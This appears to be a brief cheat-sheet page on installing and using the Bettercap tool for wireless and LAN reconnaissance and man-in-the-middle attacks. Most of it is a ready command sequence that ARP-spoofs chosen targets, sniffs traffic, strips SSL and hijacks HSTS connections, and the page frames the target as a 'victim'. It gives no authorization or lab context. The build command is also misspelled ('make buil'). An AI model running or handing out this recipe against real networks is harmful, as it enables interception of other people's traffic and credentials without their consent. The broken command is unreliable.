Bettercap

The Swiss Army knife for WiFi, Bluetooth Low Energy, wireless HID hijacking and IPv4 and IPv6 networks reconnaissance and MITM attacks.

Install

sudo apt update
sudo apt install golang git build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
git clone https://github.com/bettercap/bettercap
cd bettercap
make buil

Usage

sudo bettercap -iface eth0        // Without GUI
sudo bettercap -caplet http-ui    // With GUI
set http.proxy.sslstrip true
hstshijack/hstshijack  //For the HSTS connections

net.probe on
net.sniff on

set arp.spoof.targets OUR_TARGETS
arp.spoof on

Don't forget to run this on your console to not kill your victim internet connection:

echo 1 > /proc/sys/net/ipv4/ip_forward

Last updated

Was this helpful?